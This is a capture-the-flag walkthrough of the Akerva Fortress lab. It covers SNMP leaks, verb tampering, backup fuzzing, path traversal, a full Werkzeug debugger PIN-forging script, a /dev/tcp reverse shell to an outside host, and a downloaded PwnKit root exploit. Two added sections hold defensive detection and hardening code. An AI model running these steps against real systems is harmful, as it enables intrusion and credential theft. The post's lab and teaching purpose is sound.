
Akerva Fortress

flags 
AKERVA{Ikn0w_F0rgoTTEN#CoMmeNts} 
AKERVA{IkN0w_SnMP@@@MIsconfigur@T!onS} 
AKERVA{IKNoW###VeRbTamper!nG_==} 
AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$} 
AKERVA{IKNOW#LFi_@_} 
AKERVA{IkNOW#=ByPassWerkZeugPinC0de!} 
AKERVA{IkNow_Sud0_sUckS!} 

INITIAL RECONNAISSANCE

TCP SCAN

# Nmap 7.95 scan initiated Sat Feb  7 12:39:09 2026 as: /usr/lib/nmap/nmap --privileged -Pn -n --disable-arp-ping -sCV -p- --min-rate 3000 -oN 10.13.37.11_TCP -vvv 10.13.37.11
Nmap scan report for 10.13.37.11
Host is up, received user-set (0.11s latency).
Scanned at 2026-02-07 12:39:09 EST for 34s
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 0d:e4:41:fd:9f:a9:07:4d:25:b4:bd:5d:26:cc:4f:da (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCYsb2eP012xQGyABOzy+gWdxyHIa7xFBkwpLlFOBlYVsJp87Vtve02GudeSUjrz59c7y5nJkLxJAKQRXIObz/jzvCUkTMjH56Mc/3hzdkAzlWg/Gq3vNTyOLODkPPInJGGk1WgovnLcAJtNgdXaO7nYrDqyC8eCjBt7ppsONrz9FmEbiqLQl1m/LYb7Em6X1ZviytlJeH7eEk3UcKX45sNpzaUINdf1PJnXK3CLTB+vEAaieWz1GzCMsuRMphsmnW/d2ObpfZfCMa/NKYpAi0Z6yxUlI/HPEOWNnWO45OZ+7+M8NTxklZCHUbeCDhK8YSnpXtaEFPZvKajqZB+F2tR
|   256 f7:65:51:e0:39:37:2c:81:7f:b5:55:bd:63:9c:82:b5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEKLumcSSQuW4qihcz0zZyca/KvBaXlysVAvY/DqLV0vo4bPoz+PH0qP7vuSlgCIqdiyJKq5JFfJz58e4kujk90=
|   256 28:61:d3:5a:b9:39:f2:5b:d7:10:5a:67:ee:81:a8:5e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINAqCT5KghTKGzjImXygZG4vYKvk0akCYJaonX3hXvkE
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 5.4-alpha-47225
|_http-title: Root of the Universe – by @lydericlefebvre & @akerva_fr
|_http-favicon: Unknown favicon MD5: 6A6F2809F13E037DDC8D625B58FDA218
|_http-server-header: Apache/2.4.29 (Ubuntu)
5000/tcp open  http    syn-ack ttl 63 Python BaseHTTPServer http.server 2 or 3.0 - 3.1
| http-auth: 
| HTTP/1.0 401 UNAUTHORIZED\x0D
|_  Basic realm=Authentication Required
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-methods: 
|_  Supported Methods: HEAD OPTIONS GET
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb  7 12:39:43 2026 -- 1 IP address (1 host up) scanned in 34.34 seconds
PORT    SERVICE
80      WordPress
5000    Werkzeug 0.16.0

UDP SCAN

┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n --disable-arp-ping -sV -sU -p161 --min-rate 3000 10.13.37.11 -oN "10.13.37.11_UDP" -vvv 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-07 12:52 EST
NSE: Loaded 47 scripts for scanning.
Initiating UDP Scan at 12:52
Scanning 10.13.37.11 [1 port]
Discovered open port 161/udp on 10.13.37.11
Completed UDP Scan at 12:52, 0.24s elapsed (1 total ports)
Initiating Service scan at 12:52
NSE: Script scanning 10.13.37.11.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 12:52
Completed NSE at 12:52, 0.22s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 12:52
Completed NSE at 12:52, 0.00s elapsed
Nmap scan report for 10.13.37.11
Host is up, received user-set (0.12s latency).
Scanned at 2026-02-07 12:52:32 EST for 0s

PORT    STATE SERVICE REASON              VERSION
161/udp open  snmp    udp-response ttl 63 SNMPv1 server; net-snmp SNMPv3 server (public)
Service Info: Host: Leakage

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds
           Raw packets sent: 2 (167B) | Rcvd: 1 (78B)

SNMP SERVICE ENUMERATION

┌──(kali㉿kali)-[~]
└─$ snmpwalk -v2c -c public 10.13.37.11

iso.3.6.1.2.1.25.4.2.1.5.1236 = STRING: "-c /opt/check_backup.sh"
iso.3.6.1.2.1.25.4.2.1.5.1237 = STRING: "-c /opt/check_devSite.sh"
iso.3.6.1.2.1.25.4.2.1.5.1238 = STRING: "/opt/check_backup.sh"
iso.3.6.1.2.1.25.4.2.1.5.1239 = STRING: "/opt/check_devSite.sh"
iso.3.6.1.2.1.25.4.2.1.5.1242 = STRING: "/var/www/html/dev/space_dev.py"
iso.3.6.1.2.1.25.4.2.1.5.1243 = STRING: "/var/www/html/scripts/backup_every_17minutes.sh AKERVA{IkN0w_SnMP@@@MIsconfigur@T!onS}"
iso.3.6.1.2.1.25.4.2.1.5.1248 = STRING: "/var/www/html/dev/space_dev.py"
iso.3.6.1.2.1.25.4.2.1.5.1250 = STRING: "--socket-activation"
iso.3.6.1.2.1.25.4.2.1.5.1256 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1258 = STRING: "-k start"

verb tampering

┌──(kali㉿kali)-[~]
└─$ curl -X POST http://10.13.37.11/scripts/backup_every_17minutes.sh
#!/bin/bash
#
# This script performs backups of production and development websites.
# Backups are done every 17 minutes.
#
# AKERVA{IKNoW###VeRbTamper!nG_==}
#

SAVE_DIR=/var/www/html/backups

while true
do
        ARCHIVE_NAME=backup_$(date +%Y%m%d%H%M%S)
        echo "Erasing old backups..."
        rm -rf $SAVE_DIR/*

        echo "Backuping..."
        zip -r $SAVE_DIR/$ARCHIVE_NAME /var/www/html/*

        echo "Done..."
        sleep 1020
done

fuzzing backups

┌──(kali㉿kali)-[~]
└─$ for hour in $(seq -f "%02g" 0 23); do
    for minute in $(seq -f "%02g" 0 59); do
        for second in $(seq -f "%02g" 0 59); do
            echo "20250207${hour}${minute}${second}"
        done
    done
done > timestamps.txt


┌──(kali㉿kali)-[~]
└─$ ffuf -u http://10.13.37.11/backups/backup_FUZZ.zip -w timestamps.txt -t 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.13.37.11/backups/backup_FUZZ.zip
 :: Wordlist         : FUZZ: /home/kali/timestamps.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

20260207182947          [Status: 200, Size: 22071775, Words: 0, Lines: 0, Duration: 0ms]
:: Progress: [86400/86400] :: Job [1/1] :: 172 req/sec :: Duration: [0:01:20] :: Errors: 0 ::

┌──(kali㉿kali)-[~/akerva/var/www/html]
└─$ grep -r 'AKERVA{'
dev/space_dev.py:        "aas": generate_password_hash("AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}")
scripts/backup_every_17minutes.sh:# AKERVA{IKNoW###VeRbTamper!nG_==}
wp-content/themes/twentyfifteen/header.php:<!-- By the way, the first flag is: AKERVA{Ikn0w_F0rgoTTEN#CoMmeNts} -->
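The backup name is predictable (a timestamp) and the archive sits in the web root, so the guessing loop above shows up in the Apache access log as a burst of 404s on /backups/backup_*.zip from one client followed by a 200. The following detection logic is an added example, not from the original post; the log lines it runs over are constructed, and the 20-misses-per-minute threshold is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" access log line; the SAMPLE_LOG entries further down are constructed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) '
                    r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')
# The predictable backup_YYYYMMDDHHMMSS.zip names the backup script writes into the web root.
BACKUP_RE = re.compile(r'^/backups/backup_\d{14}\.zip$')

def parse(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    rec['status'] = int(rec['status'])
    return rec

def find_backup_enumeration(lines, threshold=20, window_s=60):
    """Return (flagged, served). flagged maps a client IP to its total number of 404s on
    backup names once it produced `threshold` misses within `window_s` seconds; served
    lists (ip, path) pairs for which an archive was actually handed out (status 200)."""
    misses, served = defaultdict(list), []
    for line in lines:
        rec = parse(line)
        if rec is None or not BACKUP_RE.match(rec['path']):
            continue
        if rec['status'] == 200:
            served.append((rec['ip'], rec['path']))
        elif rec['status'] == 404:
            misses[rec['ip']].append(rec['ts'])
    flagged = {}
    for ip, stamps in misses.items():
        stamps.sort()
        lo = 0  # sliding window over the sorted timestamps
        for hi in range(len(stamps)):
            while (stamps[hi] - stamps[lo]).total_seconds() > window_s:
                lo += 1
            if hi - lo + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged, sorted(served)

# Constructed sample: one client guesses 25 names in 25 s and then hits the real one; another is benign.
FMT = '{ip} - - [07/Feb/2026:18:31:{s:02d} +0000] "GET {path} HTTP/1.1" {st} 512'
SAMPLE_LOG = [FMT.format(ip='10.10.14.235', s=i, st=404,
                         path='/backups/backup_202602071829%02d.zip' % i) for i in range(25)]
SAMPLE_LOG.append(FMT.format(ip='10.10.14.235', s=26, st=200, path='/backups/backup_20260207182947.zip'))
SAMPLE_LOG.append(FMT.format(ip='192.0.2.10', s=30, st=200, path='/index.php'))
```

The served list is the higher-value alert: any 200 on a backup archive means the web root is handing out a copy of the whole site, regardless of how the name was found.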

code analysis

service running on port 5000

WE NOTICE THAT THE DEBUG PANEL IS ENABLED

┌──(kali㉿kali)-[~/…/var/www/html/dev]
└─$ cat space_dev.py              
#!/usr/bin/python

from flask import Flask, request
from flask_httpauth import HTTPBasicAuth
from werkzeug.security import generate_password_hash, check_password_hash

app = Flask(__name__)
auth = HTTPBasicAuth()

users = {
        "aas": generate_password_hash("AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}")
        }

@auth.verify_password
def verify_password(username, password):
    if username in users:
        return check_password_hash(users.get(username), password)
    return False

@app.route('/')
@auth.login_required
def hello_world():
    return 'Hello, World!'

# TODO
@app.route('/download')
@auth.login_required
def download():
    return downloaded_file

@app.route("/file")
@auth.login_required
def file():
        filename = request.args.get('filename')
        try:
                with open(filename, 'r') as f:
                        return f.read()
        except:
                return 'error'

if __name__ == '__main__':
    print(app)
    print(getattr(app, '__name__', getattr(app.__class__, '__name__')))
    app.run(host='0.0.0.0', port='5000', debug = True)

LFI

┌──(kali㉿kali)-[~/…/var/www/html/dev]
└─$ curl -u 'aas:AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}' -X GET 'http://10.13.37.11:5000/file?filename=../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
aas:x:1000:1000:Lyderic Lefebvre:/home/aas:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
Debian-snmp:x:111:113::/var/lib/snmp:/bin/false
mysql:x:109:115:MySQL Server,,,:/nonexistent:/bin/false
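The traversal works because file() in space_dev.py opens whatever name the client supplies. The following is an added example, not part of the original post or of the target's code: a confined replacement for that handler, assuming a downloads directory under /var/www/html/dev is the only location it may serve from (the app must also stop running with debug=True, which is what exposes the Werkzeug console).

```python
import tempfile
from pathlib import Path

# Directory the endpoint is allowed to serve from (assumed; space_dev.py opens any path).
ALLOWED_DIR = Path('/var/www/html/dev/downloads')

class UnsafePath(ValueError):
    """Raised when a requested name does not stay inside the allowed directory."""

def safe_resolve(base_dir, filename):
    """Map a user-supplied name onto base_dir and reject absolute paths, '..' segments and
    symlinks whose real target lies outside base_dir. Returns the resolved Path."""
    if not filename or '\x00' in filename:
        raise UnsafePath('empty or NUL-containing name')
    base = Path(base_dir).resolve()
    candidate = (base / filename).resolve()  # joining an absolute name discards base, hence the check
    if base not in candidate.parents:        # must be strictly inside the allowed directory
        raise UnsafePath(f'{filename!r} escapes {base}')
    return candidate

def serve_file(filename, base_dir=ALLOWED_DIR):
    """Hardened replacement for the body of file() in space_dev.py: reads are confined to
    base_dir and neither the exception nor the path is echoed back. Returns (status, body)."""
    try:
        return 200, safe_resolve(base_dir, filename).read_text()
    except UnsafePath:
        return 400, 'bad request'
    except OSError:           # missing file, directory, permission denied
        return 404, 'not found'

def demo():
    """Exercise serve_file against a constructed directory tree; returns {name: status}."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp, 'downloads')
        base.mkdir()
        (base / 'report.txt').write_text('public')
        outside = Path(tmp, 'secret.txt')
        outside.write_text('private')
        (base / 'link').symlink_to(outside)  # symlink that escapes the allowed directory
        names = ['report.txt', 'missing.txt', '../secret.txt', '/etc/passwd',
                 '../../../../etc/passwd', 'link']
        return {n: serve_file(n, base)[0] for n in names}

if __name__ == '__main__':
    print(demo())  # report.txt -> 200, missing.txt -> 404, everything else -> 400
```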

bypass werkzeug pin

┌──(kali㉿kali)-[~]
└─$ curl -u 'aas:AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}' -X GET 'http://10.13.37.11:5000/file?filename=../../../../sys/class/net/ens33/address'
┌──(kali㉿kali)-[~]
└─$ curl -u 'aas:AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}' -X GET 'http://10.13.37.11:5000/file?filename=../../../../etc/machine-id'
import hashlib
from itertools import chain

# Values the debugger derives from the running app (Werkzeug 0.16.0 on Python 2.7 here):
# username, module name, app class name and the path of flask/app.pyc
probably_public_bits = [
    'aas',
    'flask.app',
    'Flask',
    '/usr/local/lib/python2.7/dist-packages/flask/app.pyc'
]

# Values read from the target through the /file endpoint
private_bits = [
    '345051784860',  # str(uuid.getnode()), from /sys/class/net/ens33/address
    '258f132cd7e647caaf5510e3aca997c1'  # get_machine_id(), from /etc/machine-id
]

h = hashlib.md5()  # Werkzeug < 2.0 uses MD5; changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
# h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
# h.update(b'shittysalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

# Format the nine digits as groups of 5, 4 or 3, the way the console displays the PIN
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num
print(rv)

RCE

>>> __import__('os').popen('cat flag.txt').read();
'AKERVA{IKNOW#LFi_@_}\n'
>>> __import__('os').popen('/bin/bash  -c "/bin/bash -i >& /dev/tcp/10.10.14.235/4445 0>&1"').read();
>>> 
>>> 
>>> 

aas@Leakage:~$ cat .hiddenflag.txt
cat .hiddenflag.txt
AKERVA{IkNOW#=ByPassWerkZeugPinC0de!}
aas@Leakage:~$ 

SUDO CVE-2021-4034

$ wget https://raw.githubusercontent.com/dadvlingd/CVE-2021-4034/refs/heads/main/CVE-2021-4034-py3.py

$ python3 CVE-2021-4034-py3.py

$ cat flag.txt
 AKERVA{IkNow_Sud0_sUckS!}

This post is licensed under CC BY 4.0 by the author.